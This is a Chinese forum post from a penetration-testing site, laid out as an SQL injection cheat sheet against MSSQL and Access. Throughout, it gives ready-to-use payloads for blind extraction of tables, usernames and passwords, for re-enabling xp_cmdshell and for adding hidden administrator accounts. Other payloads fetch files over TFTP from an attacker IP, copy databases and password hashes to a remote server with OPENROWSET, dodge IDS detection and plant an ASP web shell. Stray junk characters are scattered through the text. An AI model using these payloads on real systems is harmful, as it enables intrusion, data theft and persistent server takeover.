中国网络渗透测试联盟

标题: SQL注入语句2 [打印本页]
作者: admin    时间: 2012-9-15 14:32
标题: SQL注入语句2
1..判断有无注入点 ) I% _& y' E- x" K7 m6 A7 I6 Q
; and 1=1 and 1=2 & ?: j9 M2 N- e. ]6 |
: }2 ?9 V/ ]- J7 c4 N7 a

4 B8 S  _' V, W2 u' W" a2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 8 d4 L7 w8 ^6 O1 \, w
and 0<>(select count(*) from *)   }  d2 L1 ?  o* O
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
) Z$ a2 b8 Q; T: |( f1 v. h% j: `6 I  M2 o7 j, }
4 X! W- m/ {# N. `# b
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 ! f; [& m% k: A5 k
and 0<(select count(*) from admin) ; o+ L% T0 e2 _  T
and 1<(select count(*) from admin)
: I, c  l1 y6 t. |5 Y猜列名还有 and (select count(列名) from 表名)>0: j5 w$ M$ h7 [( ^$ h4 F

# c1 X+ K5 {4 J/ T0 n/ a" I" o, t5 a8 ~0 ]
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. 1 k& z  D3 o6 q$ ?* u8 l
and 1=(select count(*) from admin where len(*)>0)--
" J: z- ~8 E6 ^0 @+ ^: S: }and 1=(select count(*) from admin where len(用户字段名称name)>0)
7 |1 g9 O: I' Land 1=(select count(*) from admin where len(密码字段名称password)>0)
8 ~% F: d. X) q, \
, F( ^" C' Z1 `8 T  E5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 % b; x/ L( i' A0 W
and 1=(select count(*) from admin where len(*)>0) . l! r% s. _; S9 q. i6 }0 I
and 1=(select count(*) from admin where len(name)>6) 错误 6 `& J# u0 S) X7 B' O- h
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 2 B5 p  L6 t5 E7 b/ y% f
and 1=(select count(*) from admin where len(name)=6) 正确 ' o! S- h3 ?0 N

# \3 s! F4 L- l+ @! k( Aand 1=(select count(*) from admin where len(password)>11) 正确
6 R$ w0 X- Z0 Dand 1=(select count(*) from admin where len(password)>12) 错误 长度是12
  y, z$ l7 x, }9 Dand 1=(select count(*) from admin where len(password)=12) 正确
) k! |, A8 V) E% T8 P/ T猜长度还有 and (select top 1 len(username) from admin)>5: p0 G* M8 O) Y/ W

$ K- E7 s  p& f1 Z
) ]1 k, [3 f# j9 p* W7 `6.猜解字符
' n) q1 m4 V/ Fand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 & ]  O% H# e4 `( V/ Y5 Q
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
& J2 a- z5 [' Q就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 2 k; L% \, l+ B; o/ }+ b0 [% C
! O" z: t9 b5 x0 S$ f6 Y; S5 R
猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算
" K6 X7 J+ n6 [! aand 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
! T7 |  a2 m1 U9 j) K这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. * g! f& f& r7 A  m  G/ z  s6 [

  T  `7 l) {6 X% {group by users.id having 1=1-- 6 B+ G( P% f2 [' u( v
group by users.id, users.username, users.password, users.privs having 1=1--
1 l) P3 E& b" `0 n/ z! s$ {; t; insert into users values( 666, attacker, foobar, 0xffff )-- 1 u) j9 u, f$ R

. N, a. ^% q' i0 u( e; XUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- ' `$ M& e7 d5 Q2 D. s7 l& c4 P
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
) ~: F) h1 b) J+ ~UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- . ]" ~- |) Z# l
UNION SELECT TOP 1 login_name FROM logintable-
' ?1 {% O, p1 U% c$ F* gUNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
5 x* O+ k# r3 {/ d
6 M7 [. p. L9 \$ V* J+ I8 O0 \7 N, ^看服务器打的补丁=出错了打了SP4补丁
0 S' J: P. Q# j6 @5 ~; a8 mand 1=(select @@VERSION)-- & O5 [8 y2 j  t
9 k; H2 |, A/ H* m  d: `
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 ; j) K2 i9 R- h- B
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
8 j/ o7 ~8 I' Z) _: y4 x2 O$ {* S& X5 A- j+ m
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) 9 m/ V7 x  m, G( F) |4 A) B$ Z
and sa=(SELECT System_user)--
7 }2 O9 |5 |* U& E2 F8 Vand user_name()=dbo-- % z7 f- L8 |, T* M$ m+ R
and 0<>(select user_name()-- ! Z6 v' r) Q& @5 z" J1 Q

  _4 R1 D( m" d看xp_cmdshell是否删除 8 ~  z) }6 t5 p+ |$ ^) F
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
5 O/ k# \/ V  Q, _' X/ s% d% o  C% p$ p& b: d
xp_cmdshell被删除,恢复,支持绝对路径的恢复
* J1 |  V; P) h( L7 D% J1 c;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
1 f! o+ n7 @0 C) b3 M) a;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- $ s; y' T* S% P7 t/ r0 T! {
" F" ?- L" \4 Q/ J5 P3 |* Y
反向PING自己实验
/ u8 p: k" v& C;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
8 W( p, F* b  }$ w& j' {
" K7 \  `0 x" g" O% k9 i% A8 [加帐号
; n1 l% n/ G3 M) H;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
6 i; t' Y8 D( Q" s/ o$ r5 ~) b4 e7 o7 K+ F: w7 R* V: {
创建一个虚拟目录E盘: 4 G- o& N9 S* f; v6 K% _0 d/ @. B$ L
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- 3 u: T! e" f, y9 I

  n) ?9 l9 X: c% V2 o  c访问属性:(配合写入一个webshell)
. S9 n( I2 ^: {, W. t/ j5 j: jdeclare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse 7 K- M& I* Y6 [8 X0 ^
7 J$ i3 q9 A2 S5 A

! l3 j4 i0 w  g3 {! JMSSQL也可以用联合查询
1 W/ y( L, e7 C# j4 x?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
2 T  h+ Z5 ?6 J/ a- u# v?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用) 8 j0 x, n, g; V
3 l# U5 H. d+ [: l# v

$ w; g5 _) P( D# m) L8 x) j爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 ( ^3 b  R0 ^5 Z3 |
% Y! {1 K1 ]8 R. X# u3 }5 ]; [9 C

/ `) e2 |3 Z8 M8 \/ {: [$ [- S. {
/ W. N4 o7 s6 B. k; D7 `得到WEB路径 / v5 f6 @/ p- d
;create table [dbo].[swap] ([swappass][char](255));-- & w" s) U" G% ^  [  ?
and (select top 1 swappass from swap)=1--
: A0 p9 V- h# W5 f3 Y9 t;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
6 _/ n" g+ ^8 }- K. D) l7 k;use ku1;-- : ]0 l7 s* D; k9 u2 ?
;create table cmd (str image);-- 建立image类型的表cmd , r* ^- l  t- x$ b4 T

" t, l) N; p& j5 F6 t& A5 z3 v存在xp_cmdshell的测试过程: - {2 A3 h9 E; c
;exec master..xp_cmdshell dir
. k; k7 H. r& B3 }$ Y9 };exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 % G3 ?1 B. O4 Z) X
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
3 a( q  Q/ \6 p+ ~; V;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
, d, I7 j/ z  t& n3 E' U;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- ; }* L" ?1 O( }
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
2 ^; c# W% X7 f* o8 mexec master..xp_servicecontrol start, schedule 启动服务
* p$ q$ ?: ^5 z9 ^exec master..xp_servicecontrol start, server - f* P( s, |6 D* c! X( z
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
5 f  x( {( e8 k" ~5 h/ Y" l;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add 6 V  m: V' x# h
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件
) g: G, y5 K; D* @6 R) k0 E$ S4 H
( o; a$ Z. L) c: ~2 F;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ 2 C, c! @  Z* I! i
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
, A4 C" U! q; g/ J;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat # k8 }" i! G! S9 L
如果被限制则可以。
8 m' u: @+ ]  x6 D1 S: vselect * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax) 1 A0 o" P, E: s/ x& C' s1 s5 f; v  K! o
- B+ ~) p& `: c1 w8 y
查询构造:
6 K# m6 O, M( x; x9 N' ZSELECT * FROM news WHERE id=... AND topic=... AND ..... . _9 j4 K& n2 Y/ R
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> : ?6 T: M: M$ D
select 123;-- 7 R  @1 B' O7 r- Q9 d* q0 j0 ~6 v
;use master;--
$ Y, S. L0 K  R6 k. K/ j; k:a or name like fff%;-- 显示有一个叫ffff的用户哈。
% u; m7 N0 W  x7 ]: @and 1<>(select count(email) from [user]);-- ; U+ r, F; d! J
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--   o- T# D" i9 ^# N0 f0 _& P- k+ R
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
$ ]+ E% B% ]' z/ v+ Z+ _* m;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- * x  @+ j% N, f
;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- - X* o3 A% [* P2 r
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- ' S6 d% z) A7 j
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
; v0 a! D# y! u5 e# |+ c上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
( i# z& U9 n+ z2 ]. v通过查看ffff的用户资料可得第一个用表叫ad ) K3 c- {$ z7 Q( O
然后根据表名ad得到这个表的ID 得到第二个表的名字 ! D  J6 [# e2 l9 a7 B

/ V/ I6 x3 z9 P* K2 \  finsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
! e! ]8 z5 X& Y, [insert into users values( 667,123,123,0xffff)-- 9 V9 {3 I: w0 D  G1 b9 z
insert into users values ( 123, admin--, password, 0xffff)-- " @  h& C5 F+ Q5 D4 \4 x; m& |
;and user>0
! V  K8 A! ~- ~' T;and (select count(*) from sysobjects)>0 ' p7 U9 v* I0 R3 g0 `" U7 W
;and (select count(*) from mysysobjects)>0 //为access数据库
' c' V7 u+ `, S2 ~5 t1 d! F
3 Z. N. z* e0 A) Y* F( g1 ?枚举出数据表名
. p; |& K- N$ x;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
. Q3 B4 H1 D5 V1 S9 }: [$ R) i' l这是将第一个表名更新到aaa的字段处。 + M3 W. b+ l0 V8 }2 ^
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
$ y6 p) |0 r4 O) r( y  b, ?;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- ; v3 `, k# n* `+ C3 m
然后id=1552 and exists(select * from aaa where aaa>5) 0 A6 ]) M5 i3 C) M" S% t
读出第二个表,一个个的读出,直到没有为止。
( v8 g7 _  `6 z4 p读字段是这样: $ U* Y$ I4 Y& B
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- ( U- Y; M. V% A3 F8 T, o' M( e
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 4 o1 S+ A! Y2 m& N
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- ; f* J6 o" i  W2 j+ C8 Y8 X
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 ! }* a. E, {% }' m- A2 F' M

  v$ c4 P: d+ B4 c$ ]4 U& Y[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] . `. \$ V- J  }1 H% W0 M
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
) ]0 V5 b1 o. I- Z- R9 z通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
2 [  M! `, j+ [( L, }+ w
( m/ z6 b/ M2 r* u; l[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名] 6 u2 L% S1 `1 ~) M8 V* D5 E
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] ( r4 {+ z$ |1 x' v
" K' t3 P, I. Z% ^( V; g
绕过IDS的检测[使用变量]
7 R. y) a9 ~; y- R4 x;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
3 s/ M% C  X1 M* ?! e: E" J; n" j;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
4 u, a6 H# X, v1 S/ s" b* J- h9 ]
" u! V* T2 E  P; T. e4 A2 L2 m" u1、 开启远程数据库
; U% b) j% p+ a1 ~# a3 }0 a基本语法
* R2 f0 y$ y+ B, Uselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
. j/ ]$ {2 X' |2 ?  W) a# K- g参数: (1) OLEDB Provider name # p4 Q3 o4 j: w: b0 \" x8 P
2、 其中连接字符串参数可以是任何端口用来连接,比如 ( o- p& ?0 ]/ `( X- O* ?- o
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table + t9 q! @  `1 ^$ D
3.复制目标主机的整个数据库insert所有远程表到本地表。
9 a# W/ g3 s4 P4 ?4 {2 M+ t* o! S! N; h0 [& \$ B# k
基本语法:
, O( D8 `. ^% f& d; b: w! O2 O4 `6 vinsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 ( G. w+ h5 q" L0 S. h
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
# y, I8 C1 J# n/ g3 e" J' Oinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 $ X) Y- d- |4 l. g0 S. a; `/ Y" p$ X
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
1 v# U2 o3 ^; kselect * from master.dbo.sysdatabases
* Z4 v0 L& J1 k/ F% O/ ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
  R8 z' C5 b+ `0 l, Xselect * from user_database.dbo.sysobjects
' K9 T; L2 ^4 ]& G, M8 z" v2 G4 ]insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
' G4 B( Y( V) k2 L# dselect * from user_database.dbo.syscolumns : d8 M  ?$ p4 g7 h
复制数据库:
2 n- e- k" ~" D! i& Q# minsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
9 P0 s3 r8 A/ R' a5 J* @2 d9 W$ E6 Yinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
- n2 h! W& _. A
3 s% a8 m& P  y复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: 1 F5 n- Q/ d0 b# V4 O
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
% N! n& A. T5 j得到hash之后,就可以进行暴力破解。
6 l2 g" D5 |3 v- i  H# \6 n3 W8 I  [/ o
遍历目录的方法: 先创建一个临时表:temp
# m, U" T' [9 n7 i- J" U;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- # r! I/ y& Z# F" u
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 8 o5 h' D2 h. _& C# g
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 ' D3 ^3 q3 C3 L8 x( Z% j6 `
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
' y9 S$ H/ {; p5 y/ T+ e. z3 X;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 3 G* T2 O4 m" R
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
! r6 S" ?- J) R: \;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
1 c( [8 P8 j# S: {6 t7 u' `;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc / y4 |8 n, A& K, i$ k9 j: z
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
) ~' t* i; Y. P) c( H& H% D+ v写入表:
0 C$ u* j8 R5 _5 `语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- * H5 d% h% q' U( w  |7 f
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--   `; z( Z, I) {4 X3 @
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
4 [' V% Y( d! |( H9 f语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
! k3 y# D! N6 y: \5 o! n, f语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 0 T' D+ E/ L9 v- F' ?2 ^
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- * r" _& g0 C! x$ _% P/ x
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
1 d( H; w7 |2 ^' F, g语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- + `) m4 M- Y! ]+ ?0 V4 l* |
语句9:and 1=(SELECT IS_MEMBER(db_owner));-- # X. V: n& o. ^

$ _9 e" Y' F+ G3 m) P. E7 z把路径写到表中去: 7 l* h# k1 h  O3 {0 H
;create table dirs(paths varchar(100), id int)--   B# ]2 V9 G8 A/ G
;insert dirs exec master.dbo.xp_dirtree c:\--
9 Z. f2 Q' _# _and 0<>(select top 1 paths from dirs)-- 4 K) f3 y, B5 |2 D
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
- z: ?8 u# s+ q( F! W! z  [1 e;create table dirs1(paths varchar(100), id int)--
2 k% d2 ?$ [. [# t( W;insert dirs exec master.dbo.xp_dirtree e:\web--
$ L# [) M! Y1 L, ^; jand 0<>(select top 1 paths from dirs1)--
- N4 y8 i- w6 p* U1 U+ S& z2 |$ Y! h5 g- L- s$ J# y
把数据库备份到网页目录:下载
$ S0 f' R4 |& D  q7 R;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;-- 6 d% I: \% V. C8 K

, O+ q; R4 X: h2 D$ G% D- aand 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)   s$ S( ^: L) l) q6 f: j
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
3 Y; b: b( r& [5 Z% R$ U" Aand 1=(select user_id from USER_LOGIN)
# ]. U6 |1 o6 N9 Aand 0=(select user from USER_LOGIN where user>1) 2 Y6 l2 B" O) z' ?
% ~" b$ h( O0 v' l2 w
-=- wscript.shell example -=-
" c7 l$ ?% [! L# bdeclare @o int
2 L5 ~$ P8 u+ T1 B. l- Gexec sp_oacreate wscript.shell, @o out
' M5 P* o* T  r* t- \4 ~* Aexec sp_oamethod @o, run, NULL, notepad.exe   H) b, O$ M3 ?% \0 \: X) \7 H- s
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
4 o0 |8 {5 U; f  T$ P3 x
1 V7 S9 G. F$ K' u: wdeclare @o int, @f int, @t int, @ret int
$ l$ i, x5 \; k( E  ]9 Tdeclare @line varchar(8000)
- U/ o0 U/ j0 F6 ~. T8 H( J' uexec sp_oacreate scripting.filesystemobject, @o out
) e& f' u- C/ F7 I, ^4 P, |/ Aexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 5 J: |- n1 ?# `  [9 e/ V* x: Z) X
exec @ret = sp_oamethod @f, readline, @line out 0 N+ a' \/ T" f* U9 R
while( @ret = 0 )
' B1 _" t# C; L1 Q0 p6 t  b# Kbegin 1 n' r2 t( k5 ^# c$ P
print @line # V& k$ o- T; O: d" b$ u
exec @ret = sp_oamethod @f, readline, @line out 2 c6 ]8 U8 g' Q. d
end
0 C5 `1 D2 _2 `- X2 ?( }( m& f7 o7 a% B3 N' t8 |
declare @o int, @f int, @t int, @ret int
  h3 Z- D+ h+ H7 P! g: lexec sp_oacreate scripting.filesystemobject, @o out
; ~. y6 f# \, b4 k% b8 ?* Wexec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
& |0 `9 L0 x( f3 S* [3 ]6 I5 [$ U9 jexec @ret = sp_oamethod @f, writeline, NULL,
, ?' W0 S; u3 v: z% Z<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
9 Y& q3 r7 d2 r& p5 \" Q% f3 h
declare @o int, @ret int
' N0 B) `5 \% q3 ]. pexec sp_oacreate speech.voicetext, @o out
6 [, l! R; |1 q) Eexec sp_oamethod @o, register, NULL, foo, bar
3 I* j+ r- q7 G2 i" ^4 u0 ?7 h( o4 nexec sp_oasetproperty @o, speed, 150
9 s0 [, R$ V: S6 Eexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 9 x" L$ j* H$ |& U
waitfor delay 00:00:05
! a2 C7 ]1 b6 n7 i. Q
1 R- y1 |% U5 c# m7 `( m! K: w; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- ( j/ p! k8 H1 A. f- a- H. n  G; F
$ `6 M4 Q/ K( Q1 z5 c) U
xp_dirtree适用权限PUBLIC % V3 c1 P/ s. y2 C1 W/ B
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
2 Q+ Z5 J! \6 A) h* ^create table dirs(paths varchar(100), id int) 1 l; m/ u* K' Z1 C; y( A3 N
建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。
3 C2 l$ _$ N2 m+ L& jinsert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!( f3 K" O. x/ L1 r2 y




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2